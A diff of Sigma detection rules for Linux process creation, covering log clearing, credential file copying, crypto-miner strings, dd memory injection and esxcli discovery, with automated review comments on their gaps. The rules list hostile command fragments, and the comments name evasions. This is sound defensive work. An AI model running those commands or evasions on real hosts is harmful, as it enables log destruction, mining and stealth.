@@ -2,23 +2,27 @@ title: Cat Sudoers id: 0f79c4d2-4e1f-4683-9c36-b5469a665e06 status: test description: Detects the execution of a cat /etc/sudoers to list all users that have sudo rights -author: Florian Roth references: - - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/sleventyeleven/linuxprivchecker/ +author: Florian Roth (Nextron Systems) date: 2022/06/20 +modified: 2022/09/15 +tags: + - attack.reconnaissance + - attack.t1592.004 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: - - '/cat' - - 'grep' - CommandLine|contains: ' /etc/sudoers' - condition: selection + selection: + Image|endswith: + - '/cat' + - 'grep' + - '/head' + - '/tail' + - '/more' + CommandLine|contains: ' /etc/sudoers' + condition: selection falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: medium -tags: - - attack.reconnaissance - - attack.t1592.004 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml new file mode 100644 index 000000000..3d3a589c9 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml 
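Review bot: The tags `attack.reconnaissance` / `attack.t1592.004` describe pre-compromise information gathering about a victim, whereas reading `/etc/sudoers` on the host is post-access discovery; `attack.discovery` with `attack.t1083` (or `attack.t1087.001`) fits better, but check against the ATT&CK version you map to. The expanded `Image` list still omits common viewers (`'/less'`, `'/vi'`, `'/vim'`, `'/nano'`, `'/awk'`, `'/strings'`), and `'grep'` without a leading slash also matches `/pgrep`, which is harmless but worth a comment. `' /etc/sudoers'` also matches the `/etc/sudoers.d/` drop-in directory, which is presumably intended and could be stated in the description.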
@@ -0,0 +1,25 @@ +title: Remove Immutable File Attribute +id: 34979410-e4b5-4e5d-8cfb-389fdff05c12 +related: + - id: a5b977d6-8a81-4475-91b9-49dbfcd941f7 + type: derived +status: test +description: Detects usage of the 'chattr' utility to remove immutable file attribute. +references: + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/09/15 +tags: + - attack.defense_evasion + - attack.t1222.002 +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: '/chattr' + CommandLine|contains: ' -i ' + condition: selection +falsepositives: + - Administrator interacting with immutable files (e.g. for instance backups). +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml index 39899711a..37aee1399 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml @@ -1,11 +1,15 @@ title: Clear Linux Logs id: 80915f59-9b56-4616-9de0-fd0dea6c12fe status: stable -description: Detects clear logs +description: Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md author: Ömer Günal, oscd.community date: 2020/10/07 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md +modified: 2022/09/15 +tags: + - attack.defense_evasion + - attack.t1070.002 logsource: product: linux category: process_creation 
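Review bot: `CommandLine|contains: ' -i '` only catches the immutable flag when it is given alone; `chattr -ia file` or `chattr -ai file` (clearing several attributes at once) do not contain `' -i '` and slip through. A `|re` selector such as `CommandLine|re: ' -[a-zA-Z]*i[a-zA-Z]* '` handles combined flags, or add the common pairs `' -ia '`/`' -ai '` if regex is not available in the target backend. Either way, note the limitation in the description so the gap is visible to whoever tunes the rule.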
@@ -14,6 +18,7 @@ detection: Image|endswith: - '/rm' # covers /rmdir as well - '/shred' + - '/unlink' CommandLine|contains: - '/var/log' - '/var/spool/mail' @@ -21,6 +26,3 @@ detection: falsepositives: - Legitimate administration activities level: medium -tags: - - attack.defense_evasion - - attack.t1070.002 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml index d826716e2..ff5820eb5 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml 
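Review bot: The context comment `# covers /rmdir as well` on the `'/rm'` entry is wrong for an `endswith` match: `/usr/bin/rmdir` ends in `/rmdir`, not `/rm`, so `rmdir` never matches this selector. Either add `- '/rmdir'` next to the new `'/unlink'` entry or drop the comment so nobody relies on coverage that is not there. The detection block starts before this hunk, so the rest of the selection is not visible here.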
@@ -1,28 +1,33 @@ title: Commands to Clear or Remove the Syslog id: 3fcc9b35-39e4-44c0-a2ad-9e82b6902b31 -status: experimental -description: Detects specific commands commonly used to remove or empty the syslog. +status: test +description: Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md +author: Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC date: 2021/10/15 -author: Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +modified: 2022/09/15 tags: - - attack.impact - - attack.t1565.001 -references: - - https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_clear_syslog.yml + - attack.defense_evasion + - attack.t1070.002 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - CommandLine|contains: - - 'rm /var/log/syslog' - - 'rm -r /var/log/syslog' - - 'rm -f /var/log/syslog' - - 'rm -rf /var/log/syslog' - - 'mv /var/log/syslog' - - ' >/var/log/syslog' - - ' > /var/log/syslog' - condition: selection + selection: + CommandLine|contains: + - 'rm /var/log/syslog' + - 'rm -r /var/log/syslog' + - 'rm -f /var/log/syslog' + - 'rm -rf /var/log/syslog' + - 'unlink /var/log/syslog' + - 'unlink -r /var/log/syslog' + - 'unlink -f /var/log/syslog' + - 'unlink -rf /var/log/syslog' + - 'mv /var/log/syslog' + - ' >/var/log/syslog' + - ' > /var/log/syslog' + condition: selection falsepositives: - - Log rotation. + - Log rotation. level: high diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml index d585fc36c..bf691a47d 100644 
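Review bot: The three new entries `unlink -r`, `unlink -f` and `unlink -rf /var/log/syslog` cannot fire from a real deletion: coreutils `unlink` accepts exactly one operand and no options, so those invocations error out before touching the file, and only `'unlink /var/log/syslog'` is needed. Meanwhile `truncate -s0 /var/log/syslog` (and `-s 0`) empties the file and is not listed, and the `' >/var/log/syslog'` redirection forms only surface in process-creation data when the whole command goes through `sh -c`. Consider `- 'truncate -s0 /var/log/syslog'` / `- 'truncate -s 0 /var/log/syslog'` in place of the unused unlink flag variants, and mention the `sh -c` caveat in the description.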
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml @@ -1,31 +1,28 @@ title: Clipboard Collection with Xclip Tool id: ec127035-a636-4b9a-8555-0efd4e59f316 -status: experimental -description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. -date: 2021/10/15 +status: test +description: | + Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. + Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. +references: + - https://www.packetlabs.net/posts/clipboard-data-security/ author: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +date: 2021/10/15 +modified: 2022/09/15 tags: - - attack.impact - - attack.t1485 -references: - - https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml + - attack.collection + - attack.t1115 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection1: - Image|contains: 'xclip' - selection2: - CommandLine|contains: - - '-selection' - - '-sel' - selection3: - CommandLine|contains: - - 'clipboard' - - 'clip' - selection4: - CommandLine|contains: '-o' - condition: selection1 and selection2 and selection3 and selection4 + selection: + Image|contains: 'xclip' + CommandLine|contains|all: + - '-sel' + - 'clip' + - '-o' + condition: selection falsepositives: - - Legitimate usage of xclip tools. + - Legitimate usage of xclip tools. level: low 
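Review bot: In the collapsed `selection`, the `CommandLine|contains|all` entry `'clip'` is trivially true whenever `Image|contains: 'xclip'` holds, because the command line normally carries the binary name, so the clipboard-selection check from the old `selection3` has effectively been dropped and `xclip -sel primary -o` now matches too. If that widening is intended, say so in the description; otherwise use `- 'clipboard'` so the selection name is actually checked. `'-o'` is also a bare substring that matches any argument containing it, a minor noise source given the `-sel` requirement. `xsel -b -o` and `wl-paste` are alternative clipboard readers not covered by this rule, which could be noted for completeness.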
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cp_passwd_or_shadow_tmp.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cp_passwd_or_shadow_tmp.yml new file mode 100644 index 000000000..585d63236 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cp_passwd_or_shadow_tmp.yml @@ -0,0 +1,28 @@ +title: Copy Passwd Or Shadow From TMP Path +id: fa4aaed5-4fe0-498d-bbc0-08e3346387ba +status: test +description: Detects when the file "passwd" or "shadow" is copied from tmp path +references: + - https://blogs.blackberry.com/ + - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 +author: Joseliyo Sanchez, @Joseliyo_Jstnk +date: 2023/01/31 +tags: + - attack.credential_access + - attack.t1552.001 +logsource: + product: linux + category: process_creation +detection: + selection_img: + Image|endswith: '/cp' + selection_path: + CommandLine|contains: '/tmp/' + selection_file: + CommandLine|contains: + - 'passwd' + - 'shadow' + condition: all of selection_* +falsepositives: + - Unknown +level: high diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_crontab_enumeration.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_crontab_enumeration.yml new file mode 100644 index 000000000..15f24392a --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_crontab_enumeration.yml 
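Review bot: The `selection_file` substrings `'passwd'`/`'shadow'` are unanchored, so `cp /tmp/build/.htpasswd /etc/nginx/` or any file whose name contains `passwd` fires at level high with `falsepositives: Unknown`; `'/passwd'` and `'/shadow'` (or `' /etc/passwd'`/`' /etc/shadow'` if the target file is what matters) narrow it to the real files. The description says the file is copied from the tmp path, but `selection_path` only requires `/tmp/` somewhere on the command line, so `cp /etc/shadow /tmp/` (staging for exfiltration) matches just as well; either describe both directions or anchor the source if only one is meant. The first reference, `https://blogs.blackberry.com/`, is a bare domain rather than the article; link the specific post.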
@@ -0,0 +1,25 @@ +title: Crontab Enumeration +id: 403ed92c-b7ec-4edd-9947-5b535ee12d46 +status: experimental +description: Detects usage of crontab to list the tasks of the user +references: + - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html + - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ + - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection + - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection +author: Joseliyo Sanchez, @Joseliyo_Jstnk +date: 2023/06/02 +tags: + - attack.discovery + - attack.t1007 +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: '/crontab' + CommandLine|contains: ' -l' + condition: selection +falsepositives: + - Legitimate use of crontab +level: low diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml new file mode 100644 index 000000000..419d47d54 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml 
@@ -0,0 +1,23 @@ +title: Remove Scheduled Cron Task/Job +id: c2e234de-03a3-41e1-b39a-1e56dc17ba67 +status: test +description: | + Detects usage of the 'crontab' utility to remove the current crontab. + This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible +references: + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/09/15 +tags: + - attack.defense_evasion +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: 'crontab' + CommandLine|contains: ' -r' + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml index 6662c9e40..3d998d06c 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml 
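Review bot: The `tags` list has the tactic `attack.defense_evasion` but no technique; removing persistence entries maps to `attack.t1070.009` (Indicator Removal: Clear Persistence) in ATT&CK v12 and later, so add it if the version you map to has it. `Image|endswith: 'crontab'` lacks the leading slash used by the sibling enumeration rule in this patch (`'/crontab'`), so any binary whose name merely ends in `crontab` also matches; use `Image|endswith: '/crontab'` for consistency. A short line in `falsepositives` about provisioning scripts that reset user crontabs would replace the current `Unknown`.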
@@ -1,38 +1,42 @@ title: Linux Crypto Mining Indicators id: 9069ea3c-b213-4c52-be13-86506a227ab1 -status: experimental +status: test description: Detects command line parameters or strings often used by crypto miners references: - - https://www.poolwatch.io/coin/monero + - https://www.poolwatch.io/coin/monero +author: Florian Roth (Nextron Systems) date: 2021/10/26 -author: Florian Roth +modified: 2022/12/25 +tags: + - attack.impact + - attack.t1496 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - CommandLine|contains: - - ' --cpu-priority=' - - '--donate-level=0' - - ' -o pool.' - - ' --nicehash' - - ' --algo=rx/0 ' - - 'stratum+tcp://' - - 'stratum+udp://' - # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives - - 'sh -c /sbin/modprobe msr allow_writes=on' - # base64 encoded: --donate-level= - - 'LS1kb25hdGUtbGV2ZWw9' - - '0tZG9uYXRlLWxldmVsP' - - 'tLWRvbmF0ZS1sZXZlbD' - # base64 encoded: stratum+tcp:// and stratum+udp:// - - 'c3RyYXR1bSt0Y3A6Ly' - - 'N0cmF0dW0rdGNwOi8v' - - 'zdHJhdHVtK3RjcDovL' - - 'c3RyYXR1bSt1ZHA6Ly' - - 'N0cmF0dW0rdWRwOi8v' - - 'zdHJhdHVtK3VkcDovL' - condition: selection + selection: + CommandLine|contains: + - ' --cpu-priority=' + - '--donate-level=0' + - ' -o pool.' 
+ - ' --nicehash' + - ' --algo=rx/0 ' + - 'stratum+tcp://' + - 'stratum+udp://' + # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives + - 'sh -c /sbin/modprobe msr allow_writes=on' + # base64 encoded: --donate-level= + - 'LS1kb25hdGUtbGV2ZWw9' + - '0tZG9uYXRlLWxldmVsP' + - 'tLWRvbmF0ZS1sZXZlbD' + # base64 encoded: stratum+tcp:// and stratum+udp:// + - 'c3RyYXR1bSt0Y3A6Ly' + - 'N0cmF0dW0rdGNwOi8v' + - 'zdHJhdHVtK3RjcDovL' + - 'c3RyYXR1bSt1ZHA6Ly' + - 'N0cmF0dW0rdWRwOi8v' + - 'zdHJhdHVtK3VkcDovL' + condition: selection falsepositives: - - Legitimate use of crypto miners + - Legitimate use of crypto miners level: high diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml new file mode 100644 index 000000000..1e80ebbf8 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml @@ -0,0 +1,22 @@ +title: Curl Usage on Linux +id: ea34fb97-e2c4-4afb-810f-785e4459b194 +status: test +description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server +references: + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/09/15 +tags: + - attack.command_and_control + - attack.t1105 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/curl' + condition: selection +falsepositives: + - Scripts created by developers and admins + - Administrative activity +level: low 
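Review bot: The indicator list covers `stratum+tcp://` and `stratum+udp://` but not `stratum+ssl://`, which XMRig also accepts and which public pools commonly offer on their TLS ports, so a miner pointed at an SSL endpoint passes unless another indicator such as `--donate-level=0` or `--algo=rx/0` happens to be present. Add `- 'stratum+ssl://'` plus its three base64 alignments, following the pattern already used for the tcp/udp strings, and verify each encoding before committing. `'--donate-level=0'` only covers the zero setting; `--donate-level=1` is the default and at least as common in copied configs, though matching it raises the false-positive rate, so the choice is worth a comment.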
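Review bot: `selection` is nothing more than `Image|endswith: '/curl'`, so this rule fires on every curl invocation on the host; with `attack.t1105` and a falsepositives entry of scripts created by developers and admins it becomes an alert-volume problem unless consumers already treat level low as telemetry. Either state in the description that it is an inventory/correlation rule not meant to alert on its own, or narrow it to download-to-disk and pipe-to-shell shapes (`' -o '`, `' -O'`, `'--output'`, `'| sh'`, `'| bash'`). The base64 pipe-to-shell rule in this patch already covers the decode-and-execute case, so a focused curl rule would not duplicate it.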
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml index 8fa4944dc..fa251f6e9 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml @@ -1,14 +1,14 @@ title: Atlassian Confluence CVE-2022-26134 id: 7fb14105-530e-4e2e-8cfb-99f7d8700b66 -status: experimental -description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134 -author: Nasreddine Bencherchali -date: 2022/06/03 related: - id: 245f92e3-c4da-45f1-9070-bc552e06db11 type: derived +status: test +description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134 references: - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/06/03 tags: - attack.initial_access - attack.execution diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml new file mode 100644 index 000000000..aef001baf --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml 
@@ -0,0 +1,27 @@ +title: Apache Spark Shell Command Injection - ProcessCreation +id: c8a5f584-cdc8-42cc-8cce-0398e4265de3 +status: test +description: Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective +references: + - https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py + - https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html + - https://github.com/apache/spark/pull/36315/files +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/07/20 +tags: + - attack.initial_access + - attack.t1190 + - cve.2022.33891 +logsource: + product: linux + category: process_creation +detection: + selection: + ParentImage|endswith: '\bash' + CommandLine|contains: + - 'id -Gn `' + - "id -Gn '" + condition: selection +falsepositives: + - Unlikely +level: high diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml index f6eb7104a..71ffcad28 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml 
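Review bot: `ParentImage|endswith: '\bash'` uses a backslash, so on Linux, where the path is `/bin/bash`, the selector can never match and the rule is dead as written; it should be `ParentImage|endswith: '/bash'`. The description also cites the wrong identifier, `CVE-2014-6287` (an unrelated HFS bug), while the title, tag and references are for CVE-2022-33891; fix the text to `via CVE-2022-33891`. Assuming the injection point is the `bash -c "id -Gn ..."` call described in the references, the matching event is the `id` child process rather than the Spark server itself, which is worth spelling out in the description so analysts know what a hit looks like.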
@@ -1,29 +1,30 @@ title: DD File Overwrite id: 2953194b-e33c-4859-b9e8-05948c167447 -status: experimental +status: test description: Detects potential overwriting and deletion of a file using DD. -date: 2021/10/15 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +date: 2021/10/15 +modified: 2022/07/07 tags: - attack.impact - attack.t1485 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection1: - Image: - - '/bin/dd' - - '/usr/bin/dd' - selection2: - CommandLine|contains: 'of=' - selection3: - CommandLine|contains: - - 'if=/dev/zero' - - 'if=/dev/null' - condition: selection1 and selection2 and selection3 + selection1: + Image: + - '/bin/dd' + - '/usr/bin/dd' + selection2: + CommandLine|contains: 'of=' + selection3: + CommandLine|contains: + - 'if=/dev/zero' + - 'if=/dev/null' + condition: all of selection* falsepositives: - - Any user deleting files that way. + - Any user deleting files that way. level: low diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_dd_process_injection.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_dd_process_injection.yml new file mode 100644 index 000000000..4d7d8fbbb --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_dd_process_injection.yml 
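Review bot: `selection1` pins `Image` to exactly `/bin/dd` and `/usr/bin/dd`, so `dd` under `/usr/local/bin`, a BusyBox applet path or a relocated copy escapes; the dd process-injection rule added in this patch uses `Image|endswith: '/dd'`, and this rule should match it: `Image|endswith: '/dd'`. `condition: all of selection*` works, but the glob also picks up any future key starting with `selection`, so the `selection_`-prefixed naming used elsewhere in the patch would be clearer. `if=/dev/null` yields an empty output file (truncation) rather than an overwrite, which the description could state explicitly.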
@@ -0,0 +1,26 @@ +title: Potential Linux Process Code Injection Via DD Utility +id: 4cad6c64-d6df-42d6-8dae-eb78defdc415 +status: experimental +description: Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command. +references: + - https://www.aon.com/cyber-solutions/aon_cyber_labs/linux-based-inter-process-code-injection-without-ptrace2/ + - https://github.com/AonCyberLabs/Cexigua/blob/34d338620afae4c6335ba8d8d499e1d7d3d5d7b5/overwrite.sh +author: Joseph Kamau +date: 2023/12/01 +tags: + - attack.defense_evasion + - attack.t1055.009 +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: '/dd' + CommandLine|contains|all: + - 'of=' + - '/proc/' + - '/mem' + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_disable_ufw.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_disable_ufw.yml new file mode 100644 index 000000000..f99cf647c --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_disable_ufw.yml @@ -0,0 +1,28 @@ +title: Ufw Force Stop Using Ufw-Init +id: 84c9e83c-599a-458a-a0cb-0ecce44e807a +status: test +description: Detects attempts to force stop the ufw using ufw-init +references: + - https://blogs.blackberry.com/ + - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 +author: Joseliyo Sanchez, @Joseliyo_Jstnk +date: 2023/01/18 +tags: + - attack.defense_evasion + - attack.t1562.004 +logsource: + product: linux + category: process_creation +detection: + selection_init: + CommandLine|contains|all: + - '-ufw-init' + - 'force-stop' + selection_ufw: + CommandLine|contains|all: + - 'ufw' + - 'disable' + condition: 1 of selection_* +falsepositives: + - Network administrators +level: medium 
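Review bot: `CommandLine|contains|all` uses `'/mem'` as its last token, which also matches `/proc/meminfo`, so `dd if=/proc/meminfo of=/tmp/x` (or any `of=` command mentioning a `/mem*` path) triggers this injection rule. Anchor the target to a process memory file instead, e.g. `CommandLine|re: 'of=/proc/(self|[0-9]+)/mem(\s|$)'` where the backend supports `|re`, or at least `'of=/proc/'` together with `'/mem '` plus an `endswith: '/mem'` alternative. If the referenced Cexigua script positions the write with `seek=` (not checked here), that is a further discriminator worth considering.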
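Review bot: `selection_init` requires the substring `'-ufw-init'` with a leading hyphen, but the script is normally at `/lib/ufw/ufw-init` or invoked as `ufw-init`, where the character before `ufw-init` is `/` or a space; unless the sample in the references ran it under a hyphen-prefixed name, this selection never matches and only the `ufw disable` branch works. Use `'ufw-init'` (or `'/ufw-init'`) instead. `selection_ufw` (`'ufw'` + `'disable'`) is loose on its own, since `systemctl disable ufw` or `grep disable /var/log/ufw.log` also fire; the first is arguably desirable but both belong in `falsepositives`.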
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml index c47444781..564c37a36 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml @@ -1,7 +1,7 @@ title: Linux Doas Tool Execution id: 067d8238-7127-451c-a9ec-fa78045b618b status: stable -description: Detects the doas tool execution in linux host platform. +description: Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does. references: - https://research.splunk.com/endpoint/linux_doas_tool_execution/ - https://www.makeuseof.com/how-to-install-and-use-doas/ diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_network_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_network_discovery.yml new file mode 100644 index 000000000..5d1caec25 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_network_discovery.yml 
@@ -0,0 +1,29 @@ +title: ESXi Network Configuration Discovery Via ESXCLI +id: 33e814e0-1f00-4e43-9c34-31fb7ae2b174 +status: experimental +description: Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration. +references: + - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/ + - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_network.html +author: Cedric Maurugeon +date: 2023/09/04 +tags: + - attack.discovery + - attack.t1033 + - attack.t1007 +logsource: + category: process_creation + product: linux +detection: + selection_img: + Image|endswith: '/esxcli' + CommandLine|contains: 'network' + selection_cli: + CommandLine|contains: + - ' get' + - ' list' + condition: all of selection_* +falsepositives: + - Legitimate administration activities +# Note: level can be reduced to low in some envs +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_permission_change_admin.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_permission_change_admin.yml new file mode 100644 index 000000000..fbcfc4311 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_permission_change_admin.yml 
@@ -0,0 +1,25 @@
+title: ESXi Admin Permission Assigned To Account Via ESXCLI
+id: 9691f58d-92c1-4416-8bf3-2edd753ec9cf
+status: experimental
+description: Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.
+references:
+ - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/09/04
+tags:
+ - attack.execution
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection:
+ Image|endswith: '/esxcli'
+ CommandLine|contains: 'system'
+ CommandLine|contains|all:
+ - ' permission '
+ - ' set'
+ - 'Admin'
+ condition: selection
+falsepositives:
+ - Legitimate administration activities
+level: high
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_storage_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_storage_discovery.yml
new file mode 100644
index 000000000..d2436ef0f
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_storage_discovery.yml
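Review bot: `tags` carries only the tactic `attack.execution` with no technique id, while the other new esxcli rules in this commit pair the tactic with a technique. Granting the Admin role to an account through `esxcli system permission set` is account manipulation, so `- attack.persistence` and `- attack.t1098` describe the behaviour better than a bare execution tag. The `level: high` and the `' permission '`/`'Admin'` anchoring are otherwise appropriate for the signal.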
@@ -0,0 +1,30 @@
+title: ESXi Storage Information Discovery Via ESXCLI
+id: f41dada5-3f56-4232-8503-3fb7f9cf2d60
+status: experimental
+description: Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.
+references:
+ - https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html
